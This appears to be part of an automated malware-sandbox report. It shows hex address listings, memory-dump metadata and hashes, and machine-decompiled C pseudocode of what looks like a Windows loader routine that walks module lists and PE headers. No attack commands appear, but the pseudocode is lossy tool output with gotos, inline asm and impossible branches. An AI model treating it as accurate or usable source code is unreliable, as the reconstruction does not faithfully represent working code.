                                                          0x00000000
                                                          0x0345432e
                                                          0x034542eb
                                                          0x0345434c
                                                          0x0345434e
                                                          0x03454352
                                                          0x03454359
                                                          0x0345435e
                                                          0x03454361
                                                          0x0345436e
                                                          0x0345438a
                                                          0x0345438e
                                                          0x03454396
                                                          0x0345439e
                                                          0x034543a1
                                                          0x034543ad
                                                          0x034543bb
                                                          0x034543bb
                                                          0x034543ad
                                                          0x0345436e
                                                          0x034543bf
                                                          0x034543c5
                                                          0x03454463
                                                          0x03454463
                                                          0x034543ce
                                                          0x034543d5
                                                          0x034543d9
                                                          0x034543df
                                                          0x03454475
                                                          0x03454479
                                                          0x03454491
                                                          0x03454491
                                                          0x03454479
                                                          0x034543e5
                                                          0x034543eb
                                                          0x034543f4
                                                          0x034543f6
                                                          0x034543f9
                                                          0x034543fc
                                                          0x034543ff
                                                          0x034544e8
                                                          0x034544ed
                                                          0x034544f3
                                                          0x0349e247
                                                          0x00000000
                                                          0x034544f9
                                                          0x03454504
                                                          0x03454508
                                                          0x0345450f
                                                          0x0349e269
                                                          0x00000000
                                                          0x03454515
                                                          0x03454519
                                                          0x03454531
                                                          0x03454534
                                                          0x03454537
                                                          0x0345453e
                                                          0x03454541
                                                          0x0345454a
                                                          0x0349e255
                                                          0x0349e255
                                                          0x0349e25b
                                                          0x0349e25e
                                                          0x0349e261
                                                          0x0349e261
                                                          0x03454555
                                                          0x03454559
                                                          0x0345455d
                                                          0x0349e26d
                                                          0x0349e270
                                                          0x0349e274
                                                          0x0349e27a
                                                          0x0349e27d
                                                          0x0349e28e
                                                          0x0349e28e
                                                          0x03454563
                                                          0x03454563
                                                          0x03454569
                                                          0x03454569
                                                          0x00000000
                                                          0x0345455d
                                                          0x0345450f
                                                          0x00000000
                                                          0x034544f3
                                                          0x034543ff
                                                          0x03454405
                                                          0x03454405
                                                          0x03454405
                                                          0x034542ac
                                                          0x0345428c
                                                          0x03454282
                                                          0x03454407
                                                          0x0345440d
                                                          0x0349e2af
                                                          0x0349e2af
                                                          0x03454413
                                                          0x03454413
                                                          0x00000000
                                                          0x034541d4
                                                          0x00000000
                                                          0x034541c3
                                                          0x034541bd
                                                          0x03454415
                                                          0x03454415
                                                          0x03454416
                                                          0x03454417
                                                          0x03454429
                                                          0x0345416e
                                                          0x0345416e
                                                          0x03454175
                                                          0x03454498
                                                          0x0345449f
                                                          0x0349e12d
                                                          0x00000000
                                                          0x0349e133
                                                          0x00000000
                                                          0x0349e133
                                                          0x034544a5
                                                          0x034544a5
                                                          0x034544aa
                                                          0x00000000
                                                          0x034544bb
                                                          0x034544ca
                                                          0x034544d6
                                                          0x034544d7
                                                          0x034544d8
                                                          0x034544e3
                                                          0x034544e3
                                                          0x034544aa
                                                          0x0345417b
                                                          0x0345417b
                                                          0x0345417b
                                                          0x00000000
                                                          0x0345417b
                                                          0x03454175
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3fe929492cf1f151e5f4233de2ff92d8abf289665dc452ab9591dde6b048d35
                                                          • Instruction ID: 0b6323482b52545d06614adf126cd1c788392fef158baa9a263e23d0fca9058d
                                                          • Opcode Fuzzy Hash: c3fe929492cf1f151e5f4233de2ff92d8abf289665dc452ab9591dde6b048d35
                                                          • Instruction Fuzzy Hash: B1F16B74A082518FDB24CF5AC480A3BB7E1AF89744F48496FF8968F351E734D981CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0344D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E0344D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x352d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03446600(0x35252d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3527b9c; // 0x0
							_t281 = L03454620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0347F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3527b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x3527b8c; // 0x2fd1d40
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x2fd3f68
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E03452280(_t200, 0x35284d8);
									_t277 =  *0x35285f4; // 0x2fd2518
									_t351 =  *0x35285f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x749e0000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x2fd2560
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x2fd24b0
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x2fd2560
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x2fd2d78
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0344FFB0(_t287, _t353, 0x35284d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0348CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03446600(0x35252d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03447926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x352b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E034BE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3528472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x352b218; // 0x0
														asm("ror edi, cl");
														 *0x352b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03452280(_t250, 0x35284d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03473898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0344FFB0(_t293, _t353, 0x35284d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E034737F5(_t353, 0);
																}
																E03470413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03469B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E034602D6(_t174);
																}
																L034577F0( *0x3527b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0346C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0344EC7F(_t353);
										L034619B8(_t287, 0, _t353, 0);
										_t200 = E0343F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0347B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x352b2f8; // 0xbc0000
									if((_t206 |  *0x352b2fc) == 0 || ( *0x352b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x352b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E034E6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E034E6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0344E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0344EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03479730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0344E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L03448F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03473C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                          0x0344d5f2
                                                          0x0344d5f5
                                                          0x0344d5f5
                                                          0x0344d5fd
                                                          0x0344d600
                                                          0x0344d60a
                                                          0x0344d60d
                                                          0x0344d617
                                                          0x0344d61d
                                                          0x0344d627
                                                          0x0344d62e
                                                          0x0344d911
                                                          0x0344d913
                                                          0x00000000
                                                          0x0344d919
                                                          0x0344d919
                                                          0x0344d919
                                                          0x0344d634
                                                          0x0344d634
                                                          0x0344d634
                                                          0x0344d634
                                                          0x0344d640
                                                          0x0344d8bf
                                                          0x00000000
                                                          0x0344d646
                                                          0x0344d646
                                                          0x0344d64d
                                                          0x0344d652
                                                          0x0349b2fc
                                                          0x0349b2fc
                                                          0x0349b302
                                                          0x0349b33b
                                                          0x0349b341
                                                          0x00000000
                                                          0x0349b304
                                                          0x0349b304
                                                          0x0349b319
                                                          0x0349b31e
                                                          0x0349b324
                                                          0x0349b326
                                                          0x0349b332
                                                          0x0349b347
                                                          0x0349b34c
                                                          0x0349b351
                                                          0x0349b35a
                                                          0x00000000
                                                          0x0349b328
                                                          0x0349b328
                                                          0x00000000
                                                          0x0349b328
                                                          0x0349b326
                                                          0x0344d658
                                                          0x0344d658
                                                          0x0344d65b
                                                          0x0344d665
                                                          0x00000000
                                                          0x0344d66b
                                                          0x0344d66b
                                                          0x0344d66b
                                                          0x0344d66b
                                                          0x0344d66d
                                                          0x0344d672
                                                          0x0344d67a
                                                          0x00000000
                                                          0x00000000
                                                          0x0344d680
                                                          0x0344d686
                                                          0x0344d8ce
                                                          0x0344d8d4
                                                          0x0344d8da
                                                          0x0344d8dd
                                                          0x0344d8dd
                                                          0x0344d8e0
                                                          0x0344d68c
                                                          0x0344d691
                                                          0x0344d69d
                                                          0x0344d6a2
                                                          0x0344d6a7
                                                          0x0344d6b0
                                                          0x0344d6b0
                                                          0x0344d6b5
                                                          0x0344d6e0
                                                          0x0344d6b7
                                                          0x0344d6b7
                                                          0x0344d6b9
                                                          0x0344d6b9
                                                          0x0344d6bb
                                                          0x0344d6bd
                                                          0x0344d6ce
                                                          0x0344d6d0
                                                          0x0344d6d2
                                                          0x0349b363
                                                          0x0349b365
                                                          0x00000000
                                                          0x0349b36b
                                                          0x00000000
                                                          0x0349b36b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0344d6bf
                                                          0x0344d6bf
                                                          0x0344d6e5
                                                          0x0344d6e7
                                                          0x0344d6e9
                                                          0x0344d6e9
                                                          0x0344d6ec
                                                          0x0344d6ec
                                                          0x0344d6ef
                                                          0x0344d6f5
                                                          0x0344d6f9
                                                          0x0344d6fb
                                                          0x0344d6fd
                                                          0x0344d701
                                                          0x0344d703
                                                          0x0344d70a
                                                          0x0344d70a
                                                          0x0344d70a
                                                          0x0344d701
                                                          0x0344d70d
                                                          0x0344d710
                                                          0x0344d710
                                                          0x0344d6c1
                                                          0x0344d6c1
                                                          0x0344d6c1
                                                          0x0344d6c6
                                                          0x0349b36d
                                                          0x0349b36f
                                                          0x00000000
                                                          0x0349b375
                                                          0x0349b375
                                                          0x0349b375
                                                          0x00000000
                                                          0x0349b375
                                                          0x00000000
                                                          0x0344d6cc
                                                          0x0344d6d8
                                                          0x0344d6d8
                                                          0x0344d6d8
                                                          0x00000000
                                                          0x0344d6c6
                                                          0x0344d6bf
                                                          0x00000000
                                                          0x0344d6da
                                                          0x0344d6da
                                                          0x0344d716
                                                          0x0344d71b
                                                          0x0344d720
                                                          0x0344d726
                                                          0x0344d726
                                                          0x0344d72d
                                                          0x00000000
                                                          0x0344d733
                                                          0x0344d739
                                                          0x0344d742
                                                          0x0344d750
                                                          0x0344d758
                                                          0x0344d764
                                                          0x0344d776
                                                          0x0344d77a
                                                          0x0344d783
                                                          0x0344d928
                                                          0x0344d92c
                                                          0x0344d93d
                                                          0x0344d944
                                                          0x0344d94f
                                                          0x0344d954
                                                          0x0344d956
                                                          0x0344d95f
                                                          0x0344d961
                                                          0x0344d973
                                                          0x0344d973
                                                          0x0344d956
                                                          0x0344d944
                                                          0x0344d92c
                                                          0x0344d78b
                                                          0x0349b394
                                                          0x0344d791
                                                          0x0344d798
                                                          0x0349b3a3
                                                          0x0349b3bb
                                                          0x0349b3bb
                                                          0x0344d7a5
                                                          0x0344d866
                                                          0x0344d870
                                                          0x0344d884
                                                          0x0344d892
                                                          0x0344d898
                                                          0x0344d89e
                                                          0x0344d8a0
                                                          0x0344d8a6
                                                          0x0344d8ac
                                                          0x0344d8ae
                                                          0x0344d8b4
                                                          0x0344d8b4
                                                          0x0344d8ae
                                                          0x0344d7a5
                                                          0x0344d78b
                                                          0x0344d7b1
                                                          0x0349b3c5
                                                          0x0349b3c5
                                                          0x0344d7c3
                                                          0x0344d7ca
                                                          0x0344d7e5
                                                          0x0344d7eb
                                                          0x0344d8eb
                                                          0x0344d8ed
                                                          0x00000000
                                                          0x0344d8f3
                                                          0x0344d8f3
                                                          0x0344d8f3
                                                          0x00000000
                                                          0x0344d8ed
                                                          0x0344d7cc
                                                          0x0344d7cc
                                                          0x0344d7d2
                                                          0x00000000
                                                          0x0344d7d4
                                                          0x0344d7d4
                                                          0x0344d7d7
                                                          0x0344d7df
                                                          0x0349b3d4
                                                          0x0349b3d9
                                                          0x0349b3dc
                                                          0x0349b3dc
                                                          0x0349b3df
                                                          0x0349b3e2
                                                          0x0349b468
                                                          0x0349b46d
                                                          0x0349b46f
                                                          0x0349b46f
                                                          0x0349b475
                                                          0x0344d8f8
                                                          0x0344d8f9
                                                          0x0344d8fd
                                                          0x0349b3e8
                                                          0x0349b3e8
                                                          0x0349b3eb
                                                          0x0349b3ed
                                                          0x00000000
                                                          0x0349b3ef
                                                          0x0349b3ef
                                                          0x0349b3f1
                                                          0x0349b3f4
                                                          0x0349b3fe
                                                          0x0349b404
                                                          0x0349b409
                                                          0x0349b40e
                                                          0x0349b410
                                                          0x0349b410
                                                          0x0349b414
                                                          0x0349b414
                                                          0x0349b41b
                                                          0x0349b420
                                                          0x0349b423
                                                          0x0349b425
                                                          0x0349b427
                                                          0x0349b42a
                                                          0x0349b42d
                                                          0x0349b42d
                                                          0x0349b42a
                                                          0x0349b432
                                                          0x0349b436
                                                          0x0349b438
                                                          0x0349b43b
                                                          0x0349b43b
                                                          0x0349b449
                                                          0x0349b44e
                                                          0x0349b454
                                                          0x0349b458
                                                          0x0349b458
                                                          0x0349b45d
                                                          0x00000000
                                                          0x0349b45d
                                                          0x0349b3ed
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0344d7df
                                                          0x0344d7d2
                                                          0x0344d7ca
                                                          0x0349b37c
                                                          0x0349b37e
                                                          0x0349b385
                                                          0x0349b38a
                                                          0x00000000
                                                          0x0349b38a
                                                          0x0344d742
                                                          0x0344d7f1
                                                          0x0344d7f8
                                                          0x0349b49b
                                                          0x0349b49b
                                                          0x0344d800
                                                          0x0344d837
                                                          0x0344d843
                                                          0x0344d845
                                                          0x0344d847
                                                          0x0344d84a
                                                          0x0344d84b
                                                          0x0344d84e
                                                          0x0344d857
                                                          0x0344d802
                                                          0x0344d802
                                                          0x0344d80d
                                                          0x00000000
                                                          0x0344d818
                                                          0x0344d818
                                                          0x0344d824
                                                          0x0344d831
                                                          0x0349b4a5
                                                          0x0349b4ab
                                                          0x0349b4b3
                                                          0x0349b4b8
                                                          0x0349b4bb
                                                          0x00000000
                                                          0x0349b4c1
                                                          0x0349b4c1
                                                          0x0349b4c8
                                                          0x00000000
                                                          0x0349b4ce
                                                          0x0349b4d4
                                                          0x0349b4e1
                                                          0x0349b4e3
                                                          0x0349b4e5
                                                          0x00000000
                                                          0x0349b4eb
                                                          0x0349b4f0
                                                          0x0349b4f2
                                                          0x0344dac9
                                                          0x0344dacc
                                                          0x0344dacf
                                                          0x0344dad1
                                                          0x0344dd78
                                                          0x0344dd78
                                                          0x0344dcf2
                                                          0x00000000
                                                          0x0344dad7
                                                          0x0344dad9
                                                          0x0344dadb
                                                          0x00000000
                                                          0x00000000
                                                          0x0344dae1
                                                          0x0344dae1
                                                          0x0344dae4
                                                          0x0344dae6
                                                          0x0349b4f9
                                                          0x0349b4f9
                                                          0x0349b500
                                                          0x0344daec
                                                          0x0344daec
                                                          0x0344daf5
                                                          0x0344daf8
                                                          0x0344dafb
                                                          0x0344db03
                                                          0x0344db11
                                                          0x0344db16
                                                          0x0344db19
                                                          0x0344db1b
                                                          0x0349b52c
                                                          0x0349b531
                                                          0x0349b534
                                                          0x0344db21
                                                          0x0344db21
                                                          0x0344db24
                                                          0x0344dcd9
                                                          0x0344dce2
                                                          0x0344dce5
                                                          0x0344dd6a
                                                          0x0344dd6d
                                                          0x00000000
                                                          0x0344dd73
                                                          0x0349b51a
                                                          0x0349b51c
                                                          0x0349b51f
                                                          0x0349b524
                                                          0x00000000
                                                          0x0349b524
                                                          0x0344dce7
                                                          0x0344dce7
                                                          0x0344dce7
                                                          0x00000000
                                                          0x0344dce7
